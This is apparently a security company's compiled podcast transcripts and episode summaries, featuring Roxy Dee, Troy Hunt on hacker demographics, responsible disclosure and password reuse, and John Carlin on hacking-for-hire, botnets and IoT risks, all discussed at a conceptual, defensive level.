And spending $20 to buy someone a book is a lot less of a hit on me financially than it would have been five years ago. Five years ago, I couldn't afford to drop to even $20 on a book to learn. I had to do everything online, and everything had to be free. I just want to encourage people, if you see an opportunity to help someone and, you know, for example, if you see someone that wants to speak at a conference and they just don't have the resources to do so. And you think, "Well, this $100 hotel a night, a hotel room is less of a financial hit to me than to, you know, than to that person. And that could mean the difference between them having a career-building opportunity or not having that." Just seek out ways to help people. One of the things I've been doing is the free book giveaway, where I actually have people sending me Amazon gift cards and there is actually one person that's done it consistently in large amounts. And what I do with that is, like every two weeks, I have a tweet that I send out that if you reply to it with the book that you want, then you can win that book up until I run out of money, up until I run out of Amazon dollars.
Cindy Ng: Is this person an anonymous patron or benefactor? This person just sends you an Amazon gift card...with a few bucks and you share it with everyone? That's so great.
Roxy Dee: And other people have sent me, you know, $20 to $50 in Amazon credits, and it's just a really good...It kind of happen accidentally, and there's the story of it on my Medium account.
Cindy Ng: What were the last three books that you gave away? - Oh, the last three? Well... - Or the last one, if you...
Roxy Dee: ...the most popular one right now, this is just based on the last one that I did, is the Defensive Security Handbook. That was the most popular one. But I also get a lot of requests for Practical Packet Analysis by Chris Sanders and Practical Malware Analysis. And so this one, actually, this is a very recent book that came out called the Defensive Security Handbook. That's by Amanda Berlin and Lee Brotherston. And that's about...it says, "Best practices for securing infrastructure." So it's a blue team-themed book. That's actually sold over 1,000 copies already and it just came out recently. It came out about a month ago. Yeah. So I think that's going to be a very popular book for my giveaways.
Cindy Ng: How are you growing yourself these days?
Roxy Dee: Well, I wanted to spend more time writing guides. I just want to write things that can help beginners. I have set up my Medium account, and I posted something on setting up a honeypot network, which is a very...it sounds very complicated, but I broke it down step by step. So my goal in this was to make one article where you could set it up. Because a lot of the issues I was having was, yeah, I might find a guide on how to do something, but it didn't include every single step. Like they assumed that you knew certain things before you started on that guide. So I want to write things that are easy for people to follow without having to go look up other sources. Or if they do have to look up another source, I have it listed right there. I want to make things that are not assuming that there's already prior knowledge.
Cindy Ng: Thank you so much for sharing with me, with our listeners.
Roxy Dee: Thank you for letting me tell my story, and I hope that it's helpful to people. I hope that people get some sort of inspiration, because I had a lot of struggles and, you know, there's plenty of times I could have quit. And I just want to let people know that there are other ways of doing things and you don't have to do something a certain way. You can do it the way that works for you.
We’re counting down to Blackhat USA to attend one of the world’s leading information security conference to learn about the latest research, development and trends.
We’ll also be at booth #965 handing out fabulous fidget spinners and showcasing all of our solutions that will help you protect your data from insider threats and cyberattacks.
In this podcast episode, we discuss sessions you should attend as well as questions to ask that will help you reduce risk. We even cover why it isn't wise to only rely on important research methods like honeypots save you from insider threats or other attacks.
Panelists: Cindy Ng, Kris Keyser, Kilian Englert, Mike Buckbee
Finally, after years of advocacy many popular web services have adopted two-factor authentication (2FA) as a default security measure. Unfortunately, as you might suspect attackers have figured out workarounds. For instance, attackers that intercept your PIN in a password reset man-in-the-middle attack.
So what should we do now? As the industry moves beyond 2FA, the good news is that three-factor authentication is not on the shortlist as a replacement. Google’s identity systems manager, Mark Risher said, “One of the truths we’ve found is that people won’t accept more security than they think they need.”
There have been talks about using biometrics as a promising form of authentication. In the meantime, know that using 2FA is more secure than using just a password.
Other Articles Discussed:
Right now, many companies are planning 2018’s budget. As always, it is a challenge to secure enough funds to help with IT’s growing responsibilities. Whether you’re a nonprofit, small startup or a large enterprise, you’ll be asked to stretch every dollar. In this week’s podcast, we discussed the challenges a young sysadmin volunteer might face when tasked with setting up the IT infrastructure for a nonprofit.
And for a budget interlude, I asked the panelists about the growing suggestion for engineers to take philosophy classes to help with ethics related questions.
Other Articles Discussed:
Panelists: Cindy Ng, Kilian Englert, Mike Thompson, Mike Buckbee
When it comes to infosecurity, we often equate treating data like money. And rightfully so. After all, data is valuable. Not to mention the human hours devoted to safeguarding an organization’s data.
However, when a well-orchestrated attack happens to destroy an organization’s data, rather than for financial gain, we wondered if data is really worth more than money.
Sure you can quantify the cost of tools, equipment, hours spent protecting data, but what about intellectual and emotional labor? How do we assign proper value to the creative essence and spirit of what makes our data valuable?
Other Articles Discussed:
It’s been reported that 85% of businesses are in the dark about their data. This means that they are unsure what types of data they have, where it resides, who has access to it, who owns it, or how to derive business value from it. Why is this a problem? First, the consumer data regulation, GDPR is just a year away and if you’re in the dark about your organization’s data, meeting this regulation will be a challenge. Organizations outside the EU that process EU citizens’ personal data, GDPR rules will apply to you.
Second, when you encounter attacks such as ransomware, it’s a bit of a mess to clean up. You’ll have to figure out which users were infected, if anything else got encrypted, when the attack started, and how to prevent it from happening in the future.
However, what’s worse than a ransomware attack are ones that don’t notify you like insider threats! These threats don’t present you with a ransomware-like pop-up window that tells you you’ve been hacked.
It’s probably better to be the company that got scared into implementing some internal controls, rather than the one that didn’t bother and then went out of business because all its customer data and trade secrets ended up in the public domain.
In short, it just makes good business and security sense to know where your data resides.
Other articles discussed:
Panelists: Cindy Ng, Mike Thompson, Kilian Englert, Mike Buckbee
The short answer is: if your organization store, process or share EU citizens’ personal data, GDPR rules will apply to you.
In a recent survey, 94% of large American companies say they possess EU customer data that will fall under the regulations, with only 60% of respondents that have plans in place to respond to the impact the GDPR will have on how they handle customer data.
Yes, GDPR isn’t light reading, but in this podcast we’ve found a way to simplify the GDPR’s key requirements so that you’ll get a high level sense of what you’ll need to do to become compliant.
We also discuss the promise and challenges of what GDPR can bring – changes to how consumers relate to data as well as how IT will manage consumer data.
After the podcast, you might want to check out the free 7-part video course we developed with Troy Hunt on the new European General Data Protection Regulation that will tell you: What are the requirements? Who will be affected? How does this help protect personal data?
Troy Hunt is a web security guru, Microsoft Regional Director, and author whose security work has appeared in Forbes, Time Magazine and Mashable. He’s also the creator of “Have I been pwned?”, the free online service for breach monitoring and notifications.
In this podcast, we discuss the challenges of the industry, learn about his perspective on privacy and revisit his talk from RSA, Lessons from a Billion Breached Data Records as well as a more recent talk, The Responsibility of Disclosure: Playing Nice and Staying Out of Prison.
After the podcast, you might want to check out the free 7-part video course we developed with Troy on the new European General Data Protection Regulation that will be law on May 25, 2018 - changing the landscape of regulated data protection law and the way that companies collect personal data. Pro tip: GDPR will also impact companies outside the EU.
I'd like to try to capture on a podcast things that we can't do in writing or in visual format and I think there's an emotional aspect in audio. It really helps people get to know more of who you are.
Troy Hunt: You know, those were the exact words that just came to mind as you were saying it because there's a lot of feeling and sentiment that gets lost when you just throw things out, isn't there?
Cindy Ng: Mm-hmm. Definitely. And you have a site, Have I Been Pwned, that notifies people when there's a data breach. And I was listening to your recording that you did at RSA, "Lessons from a Billion Breached Records." I thought it was really interesting that you were making the case that kids, they're 18, 19, 20 years old that are hackers, then you're mediating conversation with them. Do you talk to their parents?
Troy Hunt: No, I just tell them to go to their room and think about what they've done. And we...no, I can't do that. I feel like doing that at times because you get the sense, and to be clear, when we say, "talk," it is all text, right? This is not what you and I are doing. And to the earlier point, that, yeah, this doesn't sort of convey emotion and sentiment and maturity in the same way as a voice discussion does. This is all sort of text-based chat. And you sort of get the impression from the style of chat, the words that are used, the references that are made, you build up this mental image of who you're talking to, right? And time and time again, it's like this is a young male, it's either legally a child, you know, normally 15, 16, 17, or very young adult, maybe sort of early 20s at the eldest. And time and time again, we see that that plays out to be the case. And particularly when we look at historical incidents of the likes of "hacktivists" being arrested and charged and that's a little bit of a liberally-used term, I suspect, hacktivist. Very often when we see people that have been breaking into systems and causing havoc for not necessarily for sort of monetary gain or personal advancement, but just because it was there, just for the lulz. We see this pattern time and time again. Look, I mean, certainly, at that age, people are independent enough that I'm not going to end up in conversations with their parents. That would be condescending for me to go, "Hey, is your mom or dad there?" You know, "Can I have a chat to them?" So, we don't normally end up in that direction.
Cindy Ng: It's just funny that you're engaging with them in a very human way to verify a breach or in the process of.
Troy Hunt: You know, they are human.
Cindy Ng: Well, we really don't know what hackers look like. We have a certain kind of image of them.
Troy Hunt: Well, I mean, yes and no. So we have put faces to them insofar as we have seen many previous incidents where we've seen these people, this, you know, class of person, charged and turn up publicly. I mean, some of very sort of high-profile ones have been the likes of some of the individuals from the LulzSec hacktivist group that were very active around 2011. So we know of people like Jake Davis who was about 18 at the time who was charged. We know it's Jake because he was up there in the news as a sort of a high-profile catch, if you like, for the authorities. And we've also seen him and others as well in that group actually go on to do some really cool stuff in very productive ways. So, you know, I guess there is this part of us which knows in an evidence-based way who these individuals tend to be and the demographic they fit into. And then the point I make, particularly in the introduction of that talk about the billions of breached records, is that there's this other side which is how hackers are portrayed online. Look, I mean, there's lots of recordings of this talk, "Lessons from Billions of Breached Records," that people can go and have a look at and see what I show, but when you go to, say, Google Images Search, and you search for "hacker," it's like hoodies and green screens and binary and stuff everywhere. And it's all scary imagery. And we've got probably the media to blame for a lot of that, we've got security companies to blame for a lot of that, because they like to make this stuff scary because the more scared you are, the more security stuff you buy. So we get this sort of portrayal which is very out of step with the individuals themselves. Now, part of that as well is blown up by those individuals, whilst they are anonymous, and they're feeling invincible, and they feel that they sort of, you know, rule the world. Having a lot of sort of bravado in the way they present themselves, the way they talk. If we have a look at when we see things like attacks where data is held for ransom and we see individuals asking for money. The language they use, and the way they conduct themselves seems enormously confident, they feel infallible, they sound kind of scary. And we sort of see these three aspects, so the way they present themselves, the way the media categorizes them, and then who they actually are once they're unveiled, and those three stories tend to actually be quite different.
Cindy Ng: And do they work with others, say, if you get an encounter with ransomware, and you go to their site and there's tech support, customer support, are those people working independently, and are they 18 years old?
Troy Hunt: You know, the way I like to explain it, and certainly, it's not just me, I see other people use these categories as well, is, there are sort of three particular demographics that we regularly see time and time again. And one demographic is this class of individual that I've just been discussing, which is sort of your hacktivist, your individual who's out there in pursuit of a greater cause, very often just bored kids with time on their hands. And, you know, they're dangerous because they're bored kids. Bored kids can be pretty dangerous. But they're not necessarily overly sophisticated, their attention spans can be a little short on the target, if there's not something fun and easy there, and then they move on.
There is this other category of attacker which is those that are actually out there for commercial gain, so those that have an ROI. And these are the sort of the career criminals. And, you know, this is a really interesting group, and it speaks more to the ransomware-style class of attacker where they are out there to try and make money. Now, very often, your hacktivist is out there because something was there or it was fun, it was, again, for the lulz. But these guys are saying, "Look, we've actually got an ROI here. We're going to invest in vulnerabilities, we're going to invest in exploits, we're going to invest in botnets. We'll spend money where it makes sense to make money. We will target organizations with the expectation of getting a return. They're not necessarily out there to get press and media, they're out there to make money. And something like ransomware is a really good example there. They'll indiscriminately target anyone that can be infected. So I shouldn't laugh, but I was actually in a dentist's just two days ago and whilst I was there they were busily discovering that they had ransomware. And, oh, man, watching that unfold. But inevitably, there's someone behind that who's out there to make money. And that's sort of the second category and I suspect we'll spend a bit more time there, and then in this third category we speak about state actors and sort of nation state hackers, which, of course, is also becoming a very big thing these days.
Cindy Ng: Well, I'd like to tie it into a future event that you'll be presenting. I think it's called "Playing Nice and Staying Out of Prison." And I want to hear more about that event because it reminds of these investment bankers who got caught doing insider trading, and they said that everyone inside the community, they were doing it and making money. And then the FBI reminded them that these bankers that, just because you disagree with a law, it does not mean you can break it. And so I feel like we are treading in these interesting territories where you're sitting in front of a computer. You don't necessarily have to be in a suit, but it's still considered like a white-collar crime? Is this something that you're presenting on, or?
Troy Hunt: No, look, you're pretty much right there. In fact, the talk I'm doing, it's at the AusCERT Conference in Australia. And it's the only conference I go to that I can walk to, which I'm very happy about. Because normally I've got to get on airplanes. But this talk is called "The Responsibility of Disclosure, Playing Nice and Staying Out of Prison." And it's actually a talk that AusCERT asked me to do. So AusCERT is a national computer emergency response team, it's an organization that provides services to companies in Australia to help them deal with things like security incidents. And in fact, I worked with them quite a bit last year when the Red Cross blood bank service inadvertently published their database backups publicly. So I've had quite a bit to do with them, and they really wanted me to talk about, how do we do responsible disclosure in a responsible fashion? So I talk a lot about the way individuals need to go about their responsible disclosure, and I've got an example here, I'll give everyone a highlight before I talk about it. I got an email the other day from a guy, and the guy says, "I'm a fledgling IT professional that likes to delve into web development and security." It's like, "Oh, that's very nice, thank you for emailing me." And then he goes on and he says, "I recently discovered a bug in an American company's website which reveals the names, birthdates, email addresses, physical addresses, and phone numbers of their customers." And you're sort of going, "Okay, well, that's bad, but he's discovered it," so now he's at this crossroads where he can do the right thing and get in touch with the organization or he can go down various shades of gray and do the wrong thing. And the next thing he says is, he says, "This may have been dumb," that turns out to be a very insightful comment, "But I wrote a script to grab the first 10,000 records to confirm the exploit is what I thought it was." And this is a really good example of where the guy could have grabbed the first one record and said, "Hey, look at this, I can see someone else's record, now I'm going to get in touch with the company and let them know." And they would've gone, "Okay, well, look, he's gone far enough to see one record." And let's say they did want to get all legal, and he's gotta stand there in front of the judge and go, "Look, mate, I saw one record, I reported it, I handled it ethically." But instead, he's gone and grabbed 10,000 records of other people's personal data. And as soon as you go down that road, now you've got a big problem. Because the entity involved is going to be accountable or certainly is going to be held accountable for contacting those 10,000 people and saying, "Hey, someone else grabbed your data." And that's going to invoke all sorts of other legal obligations on their behalf as well. So even though I don't think this individual had malicious intent, obviously he went way, way, way beyond what he actually needed to. And it's just interesting how...and, you know, look, maybe the script took him 20 minutes to write, but it's interesting how there's just these continual crossroads where it's so easy to do the right thing, but it's also so easy to put yourself in serious risk of legal action.
Cindy Ng: We've talked about this on our podcast a couple of times about having maybe like a technologist Hippocratic Oath in the same way that doctors might take an oath. And also, a possible problem with the law not necessarily having been caught up with how fast technology is changing. Is there something that you've seen that's helpful for people? Because it's complicated.
Troy Hunt: I think the analogies that try to compare what we do in this industry with other industries often don't fly real well. And say if we want to sort of compare ourselves to doctors, look, when you've got 15-year-old kids at home sort of doing heart surgery on an ad hoc basis, well, then, you know, then we make comparisons. But it is very different because to be a doctor you've got, you know, years and years and years of training, you've got to have qualifications, there's enormous amounts of oversight and regulation and everything else. And by the time you're actually out there practicing as a doctor and doing things that impact people's health, obviously, we have a huge amount of confidence that these are going to be people doing the right thing, that, you know, properly experienced.
Now, when we compare that to... I mean, let's look broader than just security, let's look at IT. When you compare that to what do you have to do to get involved in IT, read a book? You know, like, very, very little. And that's kind of a...what both makes it great and makes it horrifying. Where we can have people out there building systems, leaving people at risk, or conversely, people out there that have got enough capability to find vulnerabilities, but maybe not quite enough in the sort of ethics front to handle them properly.
I don't think anything around the sort of IT Hippocratic Oath or anything around IT certifications that everyone should have is ever going to be a feasible thing.
Cindy Ng: I don't know, I'm thinking, too, though, that it takes years and years to figure out how to build a layered security system, for instance, and it takes a lot of manpower.
Troy Hunt: Yeah. Yeah. Yes and no. Yeah, part of the challenge here is that we operate on such a global scale as the internet. And one of the things that organizations and the industry is always concerned about is that if we’re overly burden... I mean, let's say...in the U.S. we've said, "Okay, anyone who's going to produce software that runs on the internet has to go and do X, Y, Z certifications. And then they become burdened to do that, regardless of what the upside is, there's a time and a financial cost to do it. And then, someone goes, "Well, we could offshore it to India, and they don't have to do that, it'd be a lot cheaper." You know, so unless you get consensus on a global scale because we are talking about a global resource, being the internet, it's just not going to happen. So it is a complex problem but, you know, by the same token as well, when we look at...and we're probably sort of talking more about the defensive side here than the offensive, but when we look at where most software goes wrong, in terms of the vulnerabilities, and certainly when I look at the data breaches that I see day in and day out, these are really low-hanging risks that one person could have secured very easily if they just didn't write that code that was vulnerable to SQL injection or if they just didn't put their database back up in a publicly-facing location. It's very often very low-hanging fruit in terms of the problems that are introduced, and consequently, they're problems that could be easily fixed.
Cindy Ng: Is that part of your "Hacking Yourself" course that's super-popular and remains to be one of your most popular courses?
Troy Hunt: No, you're right, and the premise of hacking yourself first is that it's very much targeted at people building systems, and it's saying, "Hey, guys, it would be really good if you actually understood how things like SQL injection work." So not just, you know, do you understand how TSQR works and how you query a database, but do you understand how people break into the software that you're writing?
So I have an online course with Pluralsight, it's, I think, about 9 or 10 hours' worth of content on "Hack Yourself First" and I also do these workshops around the world where I sit with developers for a couple of days and we go through all of these aspects of building software and where the vulnerabilities are. And developers get this sort of first-hand experience of breaking their own things. And it's amazing to watch the lightbulbs go on in people's minds as they see how their beautiful software gets abused in all sorts of ways they never expected. And by hacking themselves first, that gives them this much more sort of defensive mindset. And as well as having a lot of fun doing it, developers do actually like breaking stuff. It also means that when they go forward and they build new software, that they're thinking with a much more defensive mindset than what they ever had before.
Cindy Ng: When you say, "lightbulbs go off," what are some common things that they go, "Oh, I never really thought about it that way," or, "This really changed my worldview?"
Troy Hunt: Well, a really good example is enumeration risks. So when you go and let's say when you register on a website. You put in an email address that already exists on the site, and the site says, "You can't use this, someone already has that email address." Now, we see that behavior day in and day out, but the thing to think about is, well, what that means is that someone can go to your website and find out if someone has an account or not. Now, what if I take a large number of email addresses, and I keep throwing them at the registration page, and I start to build up a profile of who has accounts or not. And it suddenly starts to seem not so much fun anymore. And you say to people, "How would your business feel if they were disclosing everyone who was a member of the service?" And they sort of start to go, "Well, that wouldn't be a really very good idea." "So, why are you doing it?" You know? Because the defensive pattern around this is very straightforward, you know. You've just gotta give the same response whether the account exists or not, and then you send them an email. And you say, "Well, you've already got an account, go and log in," or, "Thank you for signing up." So there are really sort of easy ways around that, and that's more of a sort of a logic issue than it is even a coding flaw.
Cindy Ng: If you were to share this talk with the business, what would they do?
Troy Hunt: Well, what it tends to do is prompt different discussions much earlier on in the design of the system. So in the case of something like enumeration, what you really want to be doing is at the point where you're sort of collecting those business requirements and having the discussion, you need to be saying to the business owner, how important is it to protect the identities of the customers of this service? Now, depending on the nature of the business, it may be more or less important. So, for example, if it is... I mean, let's just say it's Facebook. Just about everybody has a Facebook account. It's not going to be a great big sensational thing if someone goes, "Hey, I went to Facebook and I just figured out you've got..." Let's subtly put this as a site for discerning adults. Would those discerning adults have an expectation that their significant other or their workmates or their boss would not be able to go to that site, enter their email address, and discover that they like that kind of content? Well, yes, I mean, that is a very good example of where privacy is much more important. So for the most part, I really don't have a problem with either direction an organization goes, so long as it's like an evidence-based decision and they arrive there having looked at the upsides and the downsides and gone, "Well, on balance, this is the right thing to do."
Cindy Ng: You mentioned privacy. Even though people are sharing their information online, people are also worried about their privacy because you've heard 60 Minutes do a segment on data brokers selling our data, and all the data breaches that you hear almost every day, and I think technology's held to a higher standard because we're seen as progressive technology people who are basically reimagining how we're interacting with the world, and we're creating awesome wearables and apps, and what is your take on our worldwide debate on privacy? Are consumers worried enough? They're not worried enough? Or, of course, you can't speak for everyone in this world, but I want to hear from you.
Troy Hunt: It's extremely nuanced and it's nuanced for many reasons. So one of the reasons is, I first used the internet in 1995 and I was at university at the time, and for me, I'd sort of gone into adulthood without having known of an internet, and without having known of an environment where we shared this information day in and day out. And now we have situations where there are qualified adults in the workforce who have never known a time without the internet. They don't really have a memory of a time without iPhones, or a time without YouTube, or any of these things that many of us that...and I don't think I'm old, but, you know, many of us sort of remember a phase where we sort of gradually transitioned into this. And what it really means is that our tolerances for privacy and sharing are really different with younger generations than what they are with my generation, and certainly with older generations as well. And this makes things really interesting because those individuals are now starting to have a lot more influence, they're getting involved in running businesses and getting into politics and all these other things that actually impact the way we as a society operate. And they are at a very different end of the spectrum to, say, my parents' generation, who have a Facebook account so they can look at the photos that I post of the kids but would never put their own things on there. So I think that's one of the big things with privacy. How different it is for different generations.
The other thing that's really interesting with privacy now is the number of devices we have that are collecting very private information. So, you know, I have an Apple watch. And that collects a lot of data and it puts it in the cloud. We have people that have things like Alexa at home, you know, or an Amazon Echo. So, smart devices that are listening to you. We have this crazy IoT state at the moment where everything from TVs, which are effectively listening to us as in your lounge room, and we've seen the likes of the CIA exploiting those, all the way through to adult toys that are internet-connected and have been shown to have vulnerabilities that disclose your private usage of them. So this is the sort of interesting paradox now, we've got so much collection of this very, very personal, very private data. Yet, on the other hand, we're also seeing increasing regulation to try and ensure we have privacy. So we've got things like GDPR hitting in about a years' time. Which is very centered around putting the control of personal data back into the hands of those who own it. And stuff like that becomes really interesting. Because we're saying, "Hey, under GDPR, you might have a smart fridge, and the organization that holds the data from your smart fridge needs to recognize that it's your data and you can have it erased and you can have access to it and do whatever you want. And there's going to be more of it than ever because the fridge is constantly talking about, I don't know, whatever it is a smart fridge talks about." So it's a really interesting set of different factors all happening at the same time.
Cindy Ng: What's a question that you get over and over again that you get tired of explaining that, "I wish people would just get this right."
Troy Hunt: I would say, why do you need a password manager? This week, I loaded more than a billion records into Have I Been Pwned from a couple of what they call combo lists. So, these are just big lists of email addresses and passwords built up from multiple different data breaches, we don't even know how many. And they're used for these credential stuffing attacks where attackers will take these lists, they'll feed them into software which is designed to test those credentials against services like anything from your Gmail to your Spotify account, to whatever else they can figure out to do. And they go and find how many places you've reused your password. Because if you use the same password in LinkedIn, which got breached or we saw the data come out last year, but it got breached a few years earlier, if you use that same password on LinkedIn and Spotify, and then someone's got your LinkedIn password and they go to Spotify, well, you know, now you've got a problem. Now they're in your Spotify account. And they might sell that for some small number of dollars along with hundreds of thousands of other ones. So people sort of go, "Well, yeah, but it's hard to have unique passwords that are strong."
Cindy Ng: You're no doubt extremely influential in this security space and there has been endless talk about how to bring a more diverse group into the space, and I'm wondering if you would like to provide a statement of support so that women and minorities aren't just self-organizing?
Troy Hunt: So this is an enormously emotionally-charged subject. You know, like let's just start there and I'm always really, really cautious because sometimes I'll see things said on both sides of the argument, and I'll just go, "Well, you've lost the plot." But as soon as you weigh in on these things publicly, it can get very nasty.
So I guess for context, I mean, I've got a son and a daughter so I've got a foot in both camps there. I've got a wife who is becoming more active as a speaker who is actually on a security professionals panel in that same event I just mentioned in a couple of weeks' time talking about diversity in security. And I've been involved in organizing conferences where we have to choose speakers as well. It's a very difficult situation, particularly in that latter scenario because we all want to have diversity of people because the diversity gives you a richer experience. It gives you many different perspectives and backgrounds, rather than seeing the same cast of people over and over and over again.
On the other hand, we're also really cautious that we don't end up in a situation where we're saying, "We're going to choose someone because of their gender or their race or their political view or their sexuality or whatever it may be. Not because they have good content, but because of some other attribute which they've inherited." And we're very, very cautious with that, and interestingly, for my wife and for other women I speak to, the last thing in the world they want is to be chosen just because of their gender as opposed to their capabilities. So, it becomes a really, really difficult situation.
And what I find is that we know that in technology in general, women are massively underrepresented as a gender, and anecdotally, I would say within security, it's even more significant than that. It's a very, very male-dominated sector. So I think it's a really difficult thing, and interestingly, there are parts of the world where that bias is very, very different. So apparently, Egypt has a really, really strong representation of women. I think I heard it was about half or even more. So there seems to be some cultural biases that come into play, too.
Honestly, I don't have good answers for this other than trying as parents to give our kids equal opportunities and see what they're drawn to. Obviously, trying to have cool, inclusive environments, we certainly see behavior at times which would be very uncomfortable for women, and that's not cool, that's not going to make anyone feel happy. So certainly, the conferences I'm involved in really put a lot of effort into not sort of creating that environment. And to be fair as well, we're not saying to fundamentally change normal behaviors, we're saying, "Like, let's just not be dicks." You know? "Like, let's all be nice people." And this is very often what it boils down to.
Ultimately, though, is that until that this sort of pipeline of professionals coming through, until that balance changes such that it's more evenly represented, we are going to have a significant bias towards genders and races and nationalities that simply are way, way upstream and something that we have no immediate control over at the moment.
In this concluding post of John Carlin’s Lessons from the DOJ, we cover a few emerging threats: cyber as an entry point, hacking for hire and cybersecurity in the IoT era.
One of the most notable anecdotes are John’s descriptions of how easy it was to find hacking for hire shops on the dark web. Reviews of the most usable usernames and passwords and most destructive botnets are widely available to shoppers. Also, expect things to get worse before they get better. With the volume of IoT devices now available developed without security by design, we'll need to find a way to mitigate the risks.
John Carlin: Let me move to emerging threats. We've talked about cyber as an entry part, a way that an attack can start. Even when the cyber event isn't really the critical event in the end, our electoral system and confidence in it wasn't damaged because there was an actual attack on the voting infrastructure, if there's an attack where they steal some information that's relatively easy to steal and then they get to combine with the whole campaign of essentially weaponizing information, and that caused the harm. The other trend we're seeing is the hacking for hire. I really worry about this one. I think over the next five years, what we're seeing is, the dark web now, it's so easy to use, well, I don't recommend this necessarily, but when you go on it, you see sophisticated sales bazaars that look as customer-friendly as Amazon.
And when I say that I mean it literally looks like Amazon. I went on one site and it's complete with customer reviews, like, "I gave him four stars, he's always been very reliable, and 15% of the stolen user names and passwords that he gives me work, which is a very high rate." Another one will be like, "This crook's botnet has always been really good at doing denial-of-service attacks, five stars!" So that's the way it looks right now on the dark web, and that's because they're making just so much, so much money they can invest in an infrastructure and it starts to look as corporate as our private companies.
What I worry about, is because those tools are for rent, use the botnet example, you know, one of the cases that we did was the Iranian Revolutionary Guard Corps attack on the financial sector. They hit 46 different financial institutions with the distributed denial-of-service attack, taking advantage of a huge botnet of hundreds and hundreds of thousands of compromised computers. They'd knocked financial institutions, who have a lot of resources offline, effected hundreds of thousands of customers, cost tens of millions of dollars.
Right now, on the dark web, you can rent the use of an already made botnet. So the criminal group creates the botnet, they're not the ones who necessarily use it. Right now they tend to rent it to other criminal groups who will do things like GameOver Zeus, a case that we did, you know, they'll use it for profit, they'll use it for things like injecting malware that will lead to ransomware or injecting malware for a version of extortion, essentially, where they were turning on people's video cameras and taking naked pictures, and then charging money, or all the other criminal purposes you can put a botnet to.
But it doesn't take much imagination to see how a nation stayed or a terrorist group could just rent what the criminal groups are doing to cause an attack on your companies. In terms of emerging threats, you're certainly tracking the Internet of Things era. I mean, you think about how far behind we are given where the threat is just because we moved very, very quickly from putting everything we value, from analog to digital space, connecting it to the internet over a 25-year period roughly. We're now on the verge of an even more transformative evolution, where we put not just information, but all the devices that we need from everything, from the pacemakers in our heart, the original versions that were rolled out, actually this is still an issue, for good medical reasons they wanted to be able to track in real-time information coming out of people's hearts, but they rolled it out un-encrypted, because they just don't think about it when it comes to the Internet of Things.
They were testing whether it worked, which it did, but they weren't testing whether it would work where they had security by design, if a bad guy, a crook, a terrorist, or a spy wanted to exploit them. Drones in the sky, they were rolled out, same problem, rolled out originally not encrypted commercial drone. So, again, a 12-year-old could kill someone by taking advantage of the early pacemakers, they could with drones as well. And then the automobiles on our roads, forgetting the self-driving vehicle already, estimates are 70% of the cars on the road by 2020 are essentially gonna be computers on wheels.
One of the big cases we dealt with was the proof of concept hack where someone got in through the entertainment system through the steering and braking system, then led to 1.4 million car recall of Jeep Cherokees. So that's the smart device used to cause new types of harm, from car accidents, to drones in the sky, to killing people on pacemakers. But we also just have the sheer volume, it's exponentially increasing and we saw the denial-of-service attack that we've all been warning about for a period of time take place this October, knocked down essentially internet connectivity for a short period of time. Because there were just so many devices, from video cameras, etc., that are default being rolled out and can be abused. So, hopefully there will be regulatory public policy focus to try to fix that.
In the interim though, my bottom line is, things are gonna get worse before they get better on the threat side, which is why we need to focus on the risk side. We won't spend too much time on what government's been doing. We've talked about some of it a little bit already, but this is...the idea is, we need to, one, bring deterrents to bare, make the bad guys feel pain. Because as long as they're getting away completely cost-free, offense is gonna continue to vastly outstrip defense. Number two, we gotta figure out a way to share information better with the private sector.
And I think you're hopefully seeing some of that now, where government agencies, FBI, Justice, Secret Service are incentivized to try to figure out ways to increase information sharing for information that, for many, many years now, has been kept only on the classified side of the house. And that's a whole new approach for government, and it just in its early steps. But, we've been moving too slowly given where the threat is, we need to do more, faster. You know, just a couple weeks ago they heard the Director of the FBI said, "Okay, they came after us in 2016 in the Presidential election, but I'm telling you they're gonna do it again in 2020," and the head of National Security Agency agreed. That's in just one sphere, so I think we're definitely in a trend now where we need to move faster in government.
What's law enforcement doing? They're increasing the cooperation. They're doing this new approach on attribution. When I was there, we issued towards towards the end a new presidential policy directive that tried to clarify who's in charge of threat, assets, intel support to make it easier. That said, if any of you guys actually looked at the attachment on that, it had something like 15 different phone numbers that you're supposed to call in the event of an incident. And so, right now, what you need to do is think ahead on your crisis and risk mitigation plan, and know by name and by face who you'd call law enforcement by having an incident response plan that you test when the worst happens.
And there's reasons...I'm not saying in every case do it, but there are reasons to do it, and it can increase the intelligence you get back. It's a hedge against risk, if what you thought was a low level act, like a criminal act, the Ferizi example, turns out to be a terrorist, at least you notified somebody. You also want to pick a door, and this requires sometime getting assistance, you want to pick the right door in government, that ideally minimizes the regulatory risk to your company, depending on what space that you're in, that the information that you provide them, as a victim, isn't used against you to say that you didn't meet some standard of care.
Even if...with the shift of administration, I know generally there's a talk about trying to decrease regulations under this administration, but when it comes to cyber, everyone's so concerned about where the risk is, that for a period of time I think we're gonna continue to see a spike, that'll hopefully level off at some point as each of the regulators tries to figure out a way they can move into this space. So, what can you do? One, most importantly, treat this as an inevitability. You know there's no wall high enough, deep enough to keep the dedicated adversary out, and that means changing the mindset.
So, where...just like many other areas, this is a risk management, incident response area. Yes, you should focus front end on trying to minimize their ability to get in but you also need to assume that they can, and then plan what's gonna happen when they're in my perimeter. That means knowing what you got, knowing where it is, doing things like assuming they can get into my system. If I have crown jewels, I shouldn't put that in a folder that's called "Crown Jewels," maybe put something else in there that will cause the bad guy to steal the wrong information. Have a loss of efficiency, which is why it's a risk mitigation exercise. I mean, you need to bring the business side in to figure out, how can I, assuming they get in, make it hardest for them to damage what need but most to get back to business. Sony, despite all the public attention, their share price was up that spring, and that's because they knew exactly who and how to call someone in the government. They actually had a good internal corporate process in place in terms of who was responsible for handling the crisis and crisis communication.
Second, assuming again that there are sophisticated adversaries that get more sophisticated, they can get in if they want to, you need to have a system that's constantly monitoring internally, what's going on from a risk standpoint, because the faster you can catch what's going on inside your system, the faster you can have plan to either kick them out, remediate it, or if you know the data is already lost, start having a plan to figure out how you can respond to it, whether it's anything from intellectual property, to salacious emails inside your system. And that way, you quickly identify and correct anomalies, reduce the loss of information.
Implement access controls, can't hit this hard enough. This is true in government as well, by the way, along with the private sector. The default was just it's just easier to give everybody access. And I think people, when it came very highly regulated types of information, maybe literally, if you know, you had source code, key intellectual property, people knew to try to limit that. But all that other type of sensitive peripheral information, pricing discussions, etc., my experience, a majority of companies don't implement internally controls as to who has access and doesn't, and part of the reason for that is because it's too complicated for the business side so they don't pay attention to doing it, and you can limit access to sensitive information and others.
